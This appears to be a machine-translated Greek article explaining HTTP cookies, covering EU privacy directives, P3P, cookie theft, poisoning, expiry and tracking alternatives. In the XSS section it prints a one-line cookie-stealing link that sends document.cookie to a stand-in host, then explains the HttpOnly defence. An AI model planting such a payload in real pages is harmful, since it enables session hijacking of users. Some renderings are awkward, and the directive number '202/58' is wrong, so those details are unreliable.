Η Οδηγία 202/58 για το απόρρητο και τις ηλεκτρονικές επικοινωνίες, περιέχει κανόνες για τη χρήση cookies. Ειδικότερα, το άρθρο 5, παράγραφος 3 της παρούσας οδηγίας απαιτεί ότι η αποθήκευση δεδομένων (όπως τα cookies) στον υπολογιστή του χρήστη μπορεί να γίνεται μόνο εάν:

• ο χρήστης ενημερώνεται για τον τρόπο χρήσης των δεδομένων·
• Ο χρήστης έχει τη δυνατότητα να αρνηθεί αυτή τη λειτουργία αποθήκευσης. Ωστόσο, το άρθρο αυτό αναφέρει επίσης ότι η αποθήκευση δεδομένων για τεχνικούς λόγους εξαιρείται από τον νόμο αυτό.

Ωστόσο, η οδηγία, η οποία επρόκειτο να εφαρμοστεί από τον Οκτώβριο του 2003, εφαρμόστηκε πολύ ατελώς σύμφωνα με μια έκθεση του Δεκεμβρίου 2004, η οποία επεσήμανε επίσης ότι ορισμένα κράτη μέλη (Σλοβακία, Λετονία, Ελλάδα, Βέλγιο και Λουξεμβούργο) δεν είχαν ακόμη μεταφέρει την οδηγία στο εσωτερικό δίκαιο.

Σύμφωνα με τη γνώμη της Ομάδας των 29 το 2010, αυτή η οδηγία, η οποία ορίζει κυρίως τη χρήση cookies για διαφημιστικούς σκοπούς συμπεριφοράς, με τη ρητή συναίνεση του χρήστη του Διαδικτύου εξακολουθεί να εφαρμόζεται ελάχιστα. Στην πραγματικότητα, οι περισσότεροι ιστότοποι το κάνουν με τρόπο που δεν συμμορφώνεται με την οδηγία, περιοριζόμενοι σε ένα απλό «banner» που ενημερώνει για τη χρήση των «cookies» χωρίς να δίνει πληροφορίες για τις χρήσεις, χωρίς να κάνει διαφοροποίηση μεταξύ «τεχνικών» cookies. cookies «παρακολούθησης», ούτε να προσφέρει πραγματική επιλογή στον χρήστη που επιθυμεί να διατηρήσει τεχνικά cookies (όπως cookies διαχείρισης καλαθιού αγορών) και να αρνηθεί τα cookies «παρακολούθησης». Στην πραγματικότητα, πολλοί ιστότοποι δεν λειτουργούν σωστά εάν απορριφθούν τα cookies, κάτι που δεν συμμορφώνεται με την οδηγία 2002/58 ή την οδηγία 95/46 (Προστασία προσωπικών δεδομένων).

Οδηγία 2009 / 136 / CE

Αυτό το υλικό έχει ενημερωθεί από την Οδηγία 2009/136/ΕΚ της 25ης Νοεμβρίου 2009, η οποία ορίζει ότι «η αποθήκευση πληροφοριών ή η απόκτηση πρόσβασης σε πληροφορίες που έχουν ήδη αποθηκευτεί στον τερματικό εξοπλισμό ενός συνδρομητή ή χρήστη επιτρέπεται μόνο υπό την προϋπόθεση ότι ο συνδρομητής ή ο χρήστης έχει δώσει τη συγκατάθεσή του, αφού λάβει, σύμφωνα με την Οδηγία 95/46/ΕΚ, σαφείς και πλήρεις πληροφορίες μεταξύ άλλων για τους σκοπούς της επεξεργασίας». Συνεπώς, η νέα οδηγία ενισχύει τις υποχρεώσεις πριν από την τοποθέτηση cookies στον υπολογιστή του χρήστη του Διαδικτύου.

Στις προκαταρκτικές σκέψεις της οδηγίας, ο Ευρωπαίος νομοθέτης διευκρινίζει ωστόσο: «Όπου είναι τεχνικά εφικτό και αποτελεσματικό, σύμφωνα με τις σχετικές διατάξεις της Οδηγίας 95/46/ΕΚ, η συναίνεση του χρήστη όσον αφορά την επεξεργασία μπορεί να εκφραστεί μέσω του χρήση των κατάλληλων ρυθμίσεων ενός προγράμματος περιήγησης ή άλλης εφαρμογής». Αλλά στην πραγματικότητα, κανένα πρόγραμμα περιήγησης μέχρι σήμερα δεν καθιστά δυνατή την αποσύνδεση των βασικών τεχνικών cookies από τα προαιρετικά που θα πρέπει να αφεθούν στην επιλογή του χρήστη.

Αυτή η νέα οδηγία μεταφέρθηκε από τους Βέλγους βουλευτές τον Ιούλιο του 2012. Μια μελέτη του 2014 δείχνει ότι ακόμη και οι βουλευτές δυσκολεύονται να υποβάλουν αίτηση τους περιορισμούς της οδηγίας.

P3P

Η προδιαγραφή P3P περιλαμβάνει τη δυνατότητα ενός διακομιστή να δηλώνει μια πολιτική απορρήτου, η οποία καθορίζει το είδος των πληροφοριών που συλλέγει και για ποιο σκοπό. Αυτές οι πολιτικές περιλαμβάνουν (αλλά δεν περιορίζονται σε) τη χρήση πληροφοριών που συλλέγονται με χρήση cookies. Σύμφωνα με τους ορισμούς του P3P, ένα πρόγραμμα περιήγησης μπορεί να αποδεχτεί ή να απορρίψει τα cookies συγκρίνοντας τις πολιτικές απορρήτου με τις προτιμήσεις του χρήστη ή ρωτώντας τον χρήστη, παρουσιάζοντας τη δήλωση απορρήτου της πολιτικής απορρήτου που έχει δηλώσει ο διακομιστής.

Πολλά προγράμματα περιήγησης, συμπεριλαμβανομένων των εκδόσεων 6 και 7 του Apple Safari και του Microsoft Internet Explorer, υποστηρίζουν P3P που επιτρέπει στο πρόγραμμα περιήγησης να καθορίσει εάν θα αποδεχτεί την αποθήκευση cookie τρίτων. Το πρόγραμμα περιήγησης Opera επιτρέπει στους χρήστες να αρνούνται τα cookies τρίτων και να δημιουργούν ένα παγκόσμιο και συγκεκριμένο προφίλ ασφαλείας για τομείς Διαδικτύου. Η έκδοση 2 του Mozilla Firefox διέκοψε την υποστήριξη P3P αλλά την επανέφερε στην έκδοση 3.

Τα cookie τρίτων μπορούν να αποκλειστούν από τα περισσότερα προγράμματα περιήγησης για να αυξηθεί το απόρρητο και να μειωθεί η παρακολούθηση διαφημίσεων, χωρίς να επηρεαστεί αρνητικά η εμπειρία του χρήστη στον ιστό. Πολλές διαφημιστικές εταιρείες προσφέρουν μια επιλογή να εξαιρεθεί σε στοχευμένη διαφήμιση, ρυθμίζοντας ένα γενικό cookie στο πρόγραμμα περιήγησης που απενεργοποιεί αυτήν τη στόχευση, αλλά μια τέτοια λύση δεν είναι πρακτικά αποτελεσματική, όταν γίνεται σεβαστή, επειδή αυτό το γενικό cookie διαγράφεται μόλις ο χρήστης διαγράψει αυτά τα cookie, γεγονός που ακυρώνει την επιλογή έξω απόφαση.

Μειονεκτήματα των cookies

Εκτός από ζητήματα απορρήτου, τα cookies έχουν επίσης ορισμένα τεχνικά μειονεκτήματα. Συγκεκριμένα, δεν αναγνωρίζουν πάντα με ακρίβεια τους χρήστες, μπορούν να επιβραδύνουν την απόδοση του ιστότοπου όταν είναι σε μεγάλους αριθμούς, μπορούν να χρησιμοποιηθούν για επιθέσεις ασφαλείας και έρχονται σε σύγκρουση με την αντιπροσωπευτική μεταφορά κατάστασης, το αρχιτεκτονικό στυλ του λογισμικού.

Ανακριβής αναγνώριση

Εάν χρησιμοποιούνται περισσότερα από ένα προγράμματα περιήγησης σε έναν υπολογιστή, σε καθένα από αυτά υπάρχει πάντα μια ξεχωριστή μονάδα αποθήκευσης για cookies. Επομένως, τα cookies δεν προσδιορίζουν ένα άτομο, αλλά τον συνδυασμό ενός λογαριασμού χρήστη, ενός υπολογιστή και ενός προγράμματος περιήγησης ιστού. Έτσι, οποιοσδήποτε μπορεί να χρησιμοποιήσει αυτούς τους λογαριασμούς, τους υπολογιστές ή τα προγράμματα περιήγησης που διαθέτουν το σύνολο των cookies. Ομοίως, τα cookies δεν κάνουν διαφοροποίηση μεταξύ πολλών χρηστών που μοιράζονται τον ίδιο λογαριασμό χρήστη, υπολογιστή και πρόγραμμα περιήγησης, όπως σε «ιντερνετ καφέ» ή σε οποιοδήποτε μέρος που παρέχει δωρεάν πρόσβαση στους πόρους του υπολογιστή.

Αλλά στην πράξη αυτή η δήλωση αποδεικνύεται λανθασμένη στην πλειονότητα των περιπτώσεων, επειδή σήμερα ένας "προσωπικός" υπολογιστής (ή ένα smartphone ή tablet, το χειρότερο) χρησιμοποιείται κυρίως από ένα άτομο. Αυτό ισοδυναμεί με στόχευση συγκεκριμένου ατόμου και μέσω του όγκου των πληροφοριών που συλλέγονται, καταλήγουν σε εξατομικευμένη στόχευση, ακόμη και αν το άτομο δεν είναι «δηλαδή» αναγνωρισμένο.

Κλοπή cookies

Ένα cookie μπορεί να κλαπεί από άλλον υπολογιστή στο δίκτυο.

Κατά την κανονική λειτουργία, τα cookies αποστέλλονται πίσω μεταξύ του διακομιστή (ή μιας ομάδας διακομιστών στον ίδιο τομέα) και του προγράμματος περιήγησης του υπολογιστή του χρήστη. Δεδομένου ότι τα cookies μπορεί να περιέχουν ευαίσθητες πληροφορίες (όνομα χρήστη, κωδικό πρόσβασης που χρησιμοποιείται για έλεγχο ταυτότητας κ.λπ.), οι τιμές τους δεν θα πρέπει να είναι προσβάσιμες σε άλλους υπολογιστές. Η κλοπή cookie είναι μια πράξη υποκλοπής cookies από μη εξουσιοδοτημένο τρίτο μέρος.

Τα cookies μπορούν να κλαπούν μέσω ενός sniffer πακέτων σε μια επίθεση που ονομάζεται πειρατεία συνεδρίας. Η κίνηση στο δίκτυο μπορεί να υποκλαπεί και να διαβαστεί από υπολογιστές διαφορετικούς από αυτούς που στέλνουν και λαμβάνουν (ειδικά στον μη κρυπτογραφημένο δημόσιο χώρο Wi-Fi). Αυτή η επισκεψιμότητα περιλαμβάνει cookie που αποστέλλονται σε περιόδους σύνδεσης χρησιμοποιώντας το απλό πρωτόκολλο HTTP. Όταν η κίνηση του δικτύου δεν είναι κρυπτογραφημένη, οι κακόβουλοι χρήστες μπορούν έτσι να διαβάσουν τις επικοινωνίες άλλων χρηστών στο δίκτυο χρησιμοποιώντας "πακέτες ανίχνευσης".

Αυτό το πρόβλημα μπορεί να ξεπεραστεί κρυπτογραφώντας τη σύνδεση μεταξύ του υπολογιστή του χρήστη και του διακομιστή χρησιμοποιώντας το πρωτόκολλο HTTPS. Ένας διακομιστής μπορεί να καθορίσει ένα ασφαλής σημαία κατά τη ρύθμιση ενός cookie. το πρόγραμμα περιήγησης θα το στείλει μόνο μέσω μιας ασφαλούς γραμμής, όπως μια σύνδεση SSL.

Ωστόσο, πολλοί ιστότοποι, αν και χρησιμοποιούν κρυπτογραφημένη επικοινωνία HTTPS για έλεγχο ταυτότητας χρήστη (δηλαδή τη σελίδα σύνδεσης), αργότερα στέλνουν cookie περιόδου λειτουργίας και άλλα δεδομένα κανονικά, μέσω μη κρυπτογραφημένων συνδέσεων HTTP για λόγους αποτελεσματικότητας. Οι εισβολείς μπορούν έτσι να υποκλέψουν τα cookie άλλων χρηστών και να τους μιμηθούν σε κατάλληλους ιστότοπους ή να τους χρησιμοποιήσουν σε επιθέσεις cookie.

Scripting στον ιστότοπο: ένα cookie που πρέπει να ανταλλάσσεται μόνο μεταξύ του διακομιστή και του πελάτη αποστέλλεται σε άλλο τρίτο μέρος.

Ένας άλλος τρόπος για να κλέψετε cookies είναι να κάνετε σενάρια ιστότοπων και να βάζετε το ίδιο το πρόγραμμα περιήγησης να στέλνει cookies σε κακόβουλους διακομιστές που δεν τα λαμβάνουν ποτέ. Τα σύγχρονα προγράμματα περιήγησης επιτρέπουν την εκτέλεση περιζήτητων τμημάτων κώδικα από τον διακομιστή. Εάν γίνεται πρόσβαση στα cookies κατά τη διάρκεια του χρόνου εκτέλεσης, οι τιμές τους ενδέχεται να κοινοποιηθούν με κάποια μορφή σε διακομιστές που δεν πρέπει να έχουν πρόσβαση σε αυτά. Η κρυπτογράφηση των cookies πριν σταλούν μέσω του δικτύου δεν βοηθά στην αποτροπή της επίθεσης.

Αυτός ο τύπος δέσμης ενεργειών εντός του ιστότοπου χρησιμοποιείται συνήθως από εισβολείς σε ιστότοπους που επιτρέπουν στους χρήστες να δημοσιεύουν περιεχόμενο HTML. Ενσωματώνοντας ένα μέρος συμβατού κώδικα στη συνεισφορά HTML, ένας εισβολέας μπορεί να λάβει cookies από άλλους χρήστες. Η γνώση αυτών των cookies μπορεί να χρησιμοποιηθεί με τη σύνδεση στον ίδιο ιστότοπο χρησιμοποιώντας τα κλεμμένα cookies, με αποτέλεσμα να αναγνωρίζεται ως ο χρήστης του οποίου τα cookies κλάπηκαν.

Ένας τρόπος για να αποτρέψετε τέτοιες επιθέσεις είναι να χρησιμοποιήσετε τη σημαία HttpOnly. είναι μια επιλογή, που εισήχθη από την έκδοση 6 του Internet Explorer στην PHP από την έκδοση 5.2.0, η οποία σχεδιάζεται να κάνει το cookie απρόσιτο στον πελάτη κοντά στο σενάριο. Ωστόσο, οι προγραμματιστές ιστού θα πρέπει να το λάβουν υπόψη κατά την ανάπτυξη του ιστότοπού τους, έτσι ώστε να έχουν ανοσία σε δέσμες ενεργειών στον ιστότοπο.

Μια άλλη απειλή ασφαλείας που χρησιμοποιείται είναι η κατασκευή ζήτησης στον ιστότοπο.

Η επίσημη τεχνική προδιαγραφή επιτρέπει την επιστροφή των cookies μόνο σε διακομιστές στον τομέα από τον οποίο προέρχονται. Ωστόσο, η αξία των cookies μπορεί να σταλεί σε άλλους διακομιστές χρησιμοποιώντας άλλα μέσα εκτός από τις κεφαλίδες cookie.

Ειδικότερα, σε γλώσσες δέσμης ενεργειών όπως η JavaScript επιτρέπεται γενικά η πρόσβαση σε τιμές cookie και μπορούν να στέλνουν αυθαίρετες τιμές σε οποιονδήποτε διακομιστή στο Διαδίκτυο. Αυτή η δυνατότητα δέσμης ενεργειών χρησιμοποιείται από ιστότοπους που επιτρέπουν στους χρήστες να δημοσιεύουν περιεχόμενο HTML για να το δουν άλλοι χρήστες.

Για παράδειγμα, ένας εισβολέας που δραστηριοποιείται στον τομέα example.com μπορεί να δημοσιεύσει ένα σχόλιο που περιέχει τον ακόλουθο σύνδεσμο που οδηγεί σε ένα δημοφιλές ιστολόγιο που διαφορετικά δεν ελέγχουν:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Όταν ένας άλλος χρήστης κάνει κλικ σε αυτόν τον σύνδεσμο, το πρόγραμμα περιήγησης εκτελεί το τμήμα του χαρακτηριστικού onclick του κώδικα, επομένως αντικαθιστά τη συμβολοσειρά document.cookie με τη λίστα των cookie χρήστη που είναι ενεργά για αυτήν τη σελίδα. Επομένως, αυτή η λίστα cookies αποστέλλεται στον διακομιστή example.com και επομένως ο εισβολέας μπορεί να συλλέξει τα cookies αυτού του χρήστη.

Αυτός ο τύπος επίθεσης είναι δύσκολο να εντοπιστεί από την πλευρά του χρήστη, επειδή το σενάριο προέρχεται από τον ίδιο τομέα που ορίζει το cookie και η λειτουργία αποστολής των τιμών φαίνεται να είναι εξουσιοδοτημένη από αυτόν τον τομέα. Θεωρείται ότι είναι ευθύνη των διαχειριστών που διαχειρίζονται αυτόν τον τύπο ιστότοπου να θέσουν περιορισμούς που εμποδίζουν τη δημοσίευση κακόβουλου κώδικα.

Τα cookies δεν είναι άμεσα ορατά σε προγράμματα πελάτη όπως το JavaScript, εάν έχουν σταλεί με τη σημαία HttpOnly. Από την άποψη του διακομιστή, η μόνη διαφορά είναι ότι στη γραμμή της κεφαλίδας Set-Cookie προστίθεται ένα νέο πεδίο που περιέχει τη συμβολοσειρά HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Όταν το πρόγραμμα περιήγησης λαμβάνει ένα τέτοιο cookie, υποτίθεται ότι το χρησιμοποιεί κανονικά στην ακόλουθη ανταλλαγή HTTP, αλλά χωρίς να το κάνει ορατό στα σενάρια που εκτελούνται στην πλευρά του πελάτη. Η σημαία HttpOnly δεν αποτελεί μέρος καμίας επίσημης τεχνικής προδιαγραφής και δεν εφαρμόζεται σε όλα τα προγράμματα περιήγησης. Σημειώστε ότι προς το παρόν δεν υπάρχει τρόπος να αποτραπεί η ανάγνωση και η εγγραφή των cookies περιόδου λειτουργίας με τη μέθοδο XMLHTTPRequest.

Τροποποίηση περιεχομένου: ένας εισβολέας στέλνει ένα μη έγκυρο cookie σε έναν διακομιστή, πιθανώς κατασκευασμένο από ένα έγκυρο cookie που αποστέλλεται από τον διακομιστή.

Αλλαγή cookies

Μόλις τα cookies πρέπει να αποθηκευτούν και να επιστραφούν αμετάβλητα στον διακομιστή, ένας εισβολέας μπορεί να τροποποιήσει την αξία των cookies πριν σταλούν πίσω στον διακομιστή. Για παράδειγμα, εάν ένα cookie περιέχει τη συνολική αξία που πρέπει να πληρώσει ο χρήστης για τα προϊόντα που τοποθετούνται στο καλάθι αγορών του καταστήματος, η αλλαγή αυτής της τιμής εκθέτει τον διακομιστή στον κίνδυνο να χρεώσει τον εισβολέα λιγότερο από την αρχική τιμή. Η διαδικασία τροποποίησης της αξίας των cookies ονομάζεται δηλητηρίαση από μπισκότα και μπορεί να χρησιμοποιηθεί μετά από κλοπή cookie για να κάνει την επίθεση επίμονη.

Στη μέθοδο παράκαμψης cookie, ο εισβολέας εκμεταλλεύεται ένα σφάλμα του προγράμματος περιήγησης για να στείλει ένα μη έγκυρο cookie στον διακομιστή.

Ωστόσο, οι περισσότεροι ιστότοποι αποθηκεύουν μόνο ένα αναγνωριστικό περιόδου σύνδεσης - έναν τυχαία δημιουργημένο μοναδικό αριθμό που χρησιμοποιείται για την αναγνώριση του χρήστη της περιόδου σύνδεσης - στο ίδιο το cookie, ενώ όλες οι άλλες πληροφορίες αποθηκεύονται στον διακομιστή. Σε αυτή την περίπτωση, αυτό το πρόβλημα επιλύεται σε μεγάλο βαθμό.

Χειρισμός cookie μεταξύ ιστοσελίδων

Κάθε ιστότοπος αναμένεται να έχει τα δικά του cookies, επομένως ένας ιστότοπος δεν θα πρέπει να μπορεί να τροποποιεί ή να δημιουργεί cookies που σχετίζονται με έναν άλλο ιστότοπο. Ένα ελάττωμα ασφαλείας του προγράμματος περιήγησης ιστού μπορεί να επιτρέψει σε κακόβουλους ιστότοπους να παραβιάσουν αυτόν τον κανόνα. Η εκμετάλλευση ενός τέτοιου ελαττώματος αναφέρεται συνήθως ως μαγείρεμα μεταξύ των χώρων. Ο σκοπός τέτοιων επιθέσεων μπορεί να είναι η κλοπή αναγνωριστικού συνεδρίας.

Οι χρήστες θα πρέπει να χρησιμοποιούν τις πιο πρόσφατες εκδόσεις των προγραμμάτων περιήγησης ιστού στα οποία αυτά τα τρωτά σημεία έχουν ουσιαστικά εξαλειφθεί.

Κατάσταση σύγκρουσης μεταξύ πελάτη και διακομιστή

Η χρήση cookies μπορεί να δημιουργήσει μια αντίφαση μεταξύ της κατάστασης του πελάτη και της κατάστασης που είναι αποθηκευμένη στο cookie. Εάν ο χρήστης αποκτήσει ένα cookie και κάνει κλικ στο κουμπί "Πίσω" του προγράμματος περιήγησης, η κατάσταση του προγράμματος περιήγησης γενικά δεν είναι η ίδια όπως πριν από αυτήν την απόκτηση. Για παράδειγμα, εάν το καλάθι ενός ηλεκτρονικού καταστήματος δημιουργείται με χρήση cookies, τα περιεχόμενα του καλαθιού δεν μπορούν να αλλάξουν όταν ο χρήστης επιστρέψει στο ιστορικό του προγράμματος περιήγησης: εάν ο χρήστης πατήσει ένα κουμπί για να προσθέσει ένα άρθρο στο καλάθι του και κάνει κλικ στο "Επιστροφή κουμπί ", το άρθρο παραμένει σε αυτό. Μπορεί να μην είναι αυτή η πρόθεση του χρήστη, ο οποίος σίγουρα θέλει να ακυρώσει την προσθήκη του άρθρου. Αυτό μπορεί να οδηγήσει σε αναξιοπιστία, σύγχυση και σφάλματα. Επομένως, οι προγραμματιστές ιστού θα πρέπει να γνωρίζουν αυτό το πρόβλημα και να εφαρμόσουν μέτρα για να χειριστούν καταστάσεις όπως αυτή.

Λήξη cookie

Τα μόνιμα cookies έχουν επικριθεί από ειδικούς σε θέματα ασφάλειας απορρήτου επειδή δεν έχουν οριστεί να λήξουν αρκετά σύντομα, επιτρέποντας έτσι στους ιστότοπους να παρακολουθούν τους χρήστες και να δημιουργούν το προφίλ τους με την πάροδο του χρόνου. Αυτή η πτυχή των cookies αποτελεί επίσης μέρος του προβλήματος της πειρατείας συνεδρίας, επειδή ένα κλεμμένο μόνιμο cookie μπορεί να χρησιμοποιηθεί για την πλαστοπροσωπία ενός χρήστη για μεγάλο χρονικό διάστημα.

Διαβάστε επίσης: GAFAM: ποιοι είναι αυτοί; Γιατί είναι (μερικές φορές) τόσο τρομακτικά;

Εναλλακτικές λύσεις για τα cookies

Ορισμένες λειτουργίες που μπορούν να εκτελεστούν χρησιμοποιώντας cookies μπορούν επίσης να εκτελεστούν χρησιμοποιώντας άλλους μηχανισμούς που παρακάμπτουν τα cookies ή αναδημιουργούν τα διαγραμμένα cookie, γεγονός που δημιουργεί προβλήματα απορρήτου με τον ίδιο τρόπο (ή μερικές φορές χειρότερα επειδή είναι αόρατα) από τα cookies.

Διεύθυνση IP

Οι χρήστες μπορούν να παρακολουθούνται με τη διεύθυνση IP του υπολογιστή που καλεί τη σελίδα. Αυτή η τεχνική είναι διαθέσιμη από την εισαγωγή του Παγκόσμιου Ιστού, καθώς οι σελίδες κατεβαίνουν, ο διακομιστής ζητά τη διεύθυνση IP του υπολογιστή που εκτελεί το πρόγραμμα περιήγησης ή το διακομιστή μεσολάβησης, εάν δεν χρησιμοποιείται καμία. Ο διακομιστής μπορεί να παρακολουθεί αυτές τις πληροφορίες είτε υπάρχουν cookies σε χρήση είτε όχι. Ωστόσο, αυτές οι διευθύνσεις είναι συνήθως λιγότερο αξιόπιστες για την αναγνώριση ενός χρήστη από τα cookie, επειδή οι υπολογιστές και οι διακομιστής μεσολάβησης ενδέχεται να χρησιμοποιούνται από κοινού από πολλούς χρήστες και ο ίδιος υπολογιστής μπορεί να λάβει διαφορετική διεύθυνση IP σε κάθε περίοδο λειτουργίας (όπως c συχνά συμβαίνει για τηλεφωνικές συνδέσεις) .

Η παρακολούθηση με διευθύνσεις IP μπορεί να είναι αξιόπιστη σε ορισμένες περιπτώσεις, όπως οι ευρυζωνικές συνδέσεις που διατηρούν την ίδια διεύθυνση IP για μεγάλο χρονικό διάστημα, όσο είναι ενεργοποιημένο.

Ορισμένα συστήματα όπως το Tor έχουν σχεδιαστεί για να διατηρούν την ανωνυμία του Διαδικτύου και να κάνουν την παρακολούθηση μέσω διεύθυνσης IP αδύνατη ή μη πρακτική.

URL

Μια πιο ακριβής τεχνική βασίζεται στην ενσωμάτωση πληροφοριών σε διευθύνσεις URL. Το τμήμα συμβολοσειράς ερωτήματος της διεύθυνσης URL είναι μια τεχνική που χρησιμοποιείται συνήθως για αυτόν τον σκοπό, αλλά μπορούν να χρησιμοποιηθούν και άλλα μέρη. Τόσο ο διακομιστής Java όσο και οι μηχανισμοί περιόδου λειτουργίας PHP χρησιμοποιούν αυτήν τη μέθοδο εάν τα cookies δεν είναι ενεργοποιημένα.

Αυτή η μέθοδος περιλαμβάνει την προσθήκη αιτημάτων συμβολοσειρών από τον διακομιστή ιστού στους συνδέσμους της ιστοσελίδας που τις μεταφέρει όταν αποστέλλεται στο πρόγραμμα περιήγησης. Όταν ο χρήστης ακολουθεί έναν σύνδεσμο, το πρόγραμμα περιήγησης επιστρέφει τη συνημμένη συμβολοσειρά ερωτήματος στον διακομιστή.

Οι συμβολοσειρές ερωτημάτων που χρησιμοποιούνται για αυτόν τον σκοπό και τα cookies μοιάζουν πολύ, και είναι πληροφορίες που επιλέγονται αυθαίρετα από τον διακομιστή και επιστρέφονται από το πρόγραμμα περιήγησης. Ωστόσο, υπάρχουν ορισμένες διαφορές: όταν μια διεύθυνση URL που περιέχει μια συμβολοσειρά ερωτήματος χρησιμοποιείται ξανά, οι ίδιες πληροφορίες αποστέλλονται στον διακομιστή. Για παράδειγμα, εάν οι προτιμήσεις ενός χρήστη κωδικοποιούνται σε μια συμβολοσειρά ερωτήματος μιας διεύθυνσης URL και ο χρήστης στείλει αυτήν τη διεύθυνση URL σε άλλον χρήστη μέσω email, αυτός ο χρήστης θα μπορεί επίσης να χρησιμοποιήσει αυτές τις προτιμήσεις.

Από την άλλη πλευρά, όταν ένας χρήστης έχει πρόσβαση στην ίδια σελίδα δύο φορές, δεν υπάρχει καμία εγγύηση ότι η ίδια συμβολοσειρά ερωτήματος θα χρησιμοποιηθεί και τις δύο φορές. Για παράδειγμα, εάν ένας χρήστης προσγειωθεί σε μια σελίδα από μια εσωτερική σελίδα ιστότοπου την πρώτη φορά και προσγειωθεί στην ίδια σελίδα από μια εξωτερική σελίδα τη δεύτερη φορά, η συμβολοσειρά ερωτήματος σε σχέση με τη σελίδα ιστότοπου είναι συνήθως διαφορετική, ενώ τα cookie είναι τα ίδια .

Άλλα μειονεκτήματα των συμβολοσειρών ερωτήματος σχετίζονται με την ασφάλεια: η διατήρηση δεδομένων που προσδιορίζει μια περίοδο λειτουργίας σε συμβολοσειρές ερωτήματος ενεργοποιεί ή απλοποιεί τις επιθέσεις σταθεροποίησης συνεδρίας, επιθέσεις αναφοράς αναγνωριστικού και άλλα exploits. Η διαβίβαση αναγνωριστικών περιόδου σύνδεσης ως cookie HTTP είναι πιο ασφαλής.

Κρυφό πεδίο φόρμας

Μια μορφή παρακολούθησης περιόδου σύνδεσης, που χρησιμοποιείται από το ASP.NET, είναι η χρήση φορμών Ιστού με κρυφά πεδία. Αυτή η τεχνική μοιάζει πολύ με τη χρήση συμβολοσειρών ερωτήματος URL για τη μεταφορά πληροφοριών και έχει τα ίδια πλεονεκτήματα και μειονεκτήματα. και αν η φόρμα υποβληθεί σε επεξεργασία με τη μέθοδο HTTP GET, τα πεδία γίνονται στην πραγματικότητα μέρος της διεύθυνσης URL του προγράμματος περιήγησης που θα τη στείλει κατά την υποβολή της φόρμας. Ωστόσο, οι περισσότερες φόρμες υποβάλλονται σε επεξεργασία με HTTP POST, γεγονός που προκαλεί την προσθήκη των πληροφοριών της φόρμας, συμπεριλαμβανομένων των κρυφών πεδίων, ως πρόσθετη είσοδο που δεν αποτελεί ούτε μέρος της διεύθυνσης URL ούτε cookie.

Αυτή η προσέγγιση έχει δύο πλεονεκτήματα από την άποψη της παρακολούθησης: πρώτον, η παρακολούθηση των πληροφοριών που τοποθετούνται στον πηγαίο κώδικα HTML και στην είσοδο POST αντί στη διεύθυνση URL θα επιτρέψει στον μέσο χρήστη να αποφύγει αυτήν την παρακολούθηση. Δεύτερον, οι πληροφορίες της περιόδου σύνδεσης δεν αντιγράφονται όταν ο χρήστης αντιγράφει τη διεύθυνση URL (για παράδειγμα, για αποθήκευση της σελίδας στο δίσκο ή αποστολή μέσω email).

παράθυρο.όνομα

Όλα τα κοινά προγράμματα περιήγησης ιστού μπορούν να αποθηκεύσουν αρκετά μεγάλο όγκο δεδομένων (2MB έως 32MB) μέσω JavaScript χρησιμοποιώντας την ιδιότητα window.name του DOM. Αυτά τα δεδομένα μπορούν να χρησιμοποιηθούν αντί για cookie περιόδου λειτουργίας και χρησιμοποιούνται επίσης σε τομείς. Η τεχνική μπορεί να συνδυαστεί με αντικείμενα JSON για την αποθήκευση ενός πολύπλοκου συνόλου μεταβλητών συνεδρίας από την πλευρά του πελάτη.

Το μειονέκτημα είναι ότι κάθε ξεχωριστό παράθυρο ή καρτέλα θα έχει αρχικά ένα κενό window.name. κατά την περιήγηση ανά καρτέλες (που ανοίγει ο χρήστης) αυτό σημαίνει ότι οι καρτέλες που ανοίγουν μεμονωμένα δεν θα έχουν όνομα παραθύρου. Επιπλέον, το window.name μπορεί να χρησιμοποιηθεί για την παρακολούθηση επισκεπτών σε διαφορετικούς ιστότοπους που μπορεί να δημιουργήσουν πρόβλημα απορρήτου.

Από ορισμένες απόψεις, αυτό μπορεί να είναι πιο ασφαλές από τα cookies, λόγω της μη εμπλοκής του διακομιστή, καθιστώντας τον έτσι άτρωτο στην επίθεση δικτύου των sniffer cookies. Ωστόσο, εάν ληφθούν ειδικά μέτρα για την προστασία των δεδομένων, είναι ευάλωτα σε περαιτέρω επιθέσεις, καθώς τα δεδομένα είναι διαθέσιμα μέσω άλλων τοποθεσιών που ανοίγουν στο ίδιο παράθυρο.

Έλεγχος ταυτότητας HTTP

Το πρωτόκολλο HTTP περιλαμβάνει τα βασικά πρωτόκολλα ελέγχου ταυτότητας πρόσβασης και τη σύνοψη ελέγχου ταυτότητας πρόσβασης, η οποία επιτρέπει την πρόσβαση σε μια ιστοσελίδα μόνο όταν ο χρήστης έχει δώσει το όνομα χρήστη και τον κωδικό πρόσβασης. Εάν ο διακομιστής ζητήσει ένα πιστοποιητικό για την παραχώρηση πρόσβασης σε μια ιστοσελίδα, το πρόγραμμα περιήγησης το ζητά από τον χρήστη και μόλις το αποκτήσει, το πρόγραμμα περιήγησης το αποθηκεύει και το στέλνει σε όλα τα επόμενα αιτήματα HTTP. Αυτές οι πληροφορίες μπορούν να χρησιμοποιηθούν για την παρακολούθηση του χρήστη.

Τοπικό κοινόχρηστο αντικείμενο

Εάν ένα πρόγραμμα περιήγησης περιλαμβάνει την προσθήκη Adobe Flash Player, το τοπικά κοινόχρηστα αντικείμενα μπορεί να χρησιμοποιηθεί για τον ίδιο σκοπό με τα cookies. Μπορούν να είναι μια ελκυστική επιλογή για προγραμματιστές ιστού επειδή:

• το προεπιλεγμένο όριο μεγέθους για ένα τοπικό κοινόχρηστο αντικείμενο είναι 100 KB.
• Οι έλεγχοι ασφαλείας είναι ξεχωριστοί από τους ελέγχους cookie χρήστη (έτσι μπορούν να επιτρέπονται τοπικά κοινόχρηστα αντικείμενα όταν δεν επιτρέπονται τα cookie).

Αυτό το τελευταίο σημείο, το οποίο διακρίνει την πολιτική διαχείρισης cookie από αυτή των τοπικών κοινόχρηστων αντικειμένων της Adobe εγείρει ερωτήματα σχετικά με τη διαχείριση από τον χρήστη των ρυθμίσεων απορρήτου του: πρέπει να γνωρίζει ότι η διαχείριση των cookies δεν έχει καμία επίδραση στη διαχείριση των τοπικών κοινόχρηστων αντικειμένων και αντίστροφα.

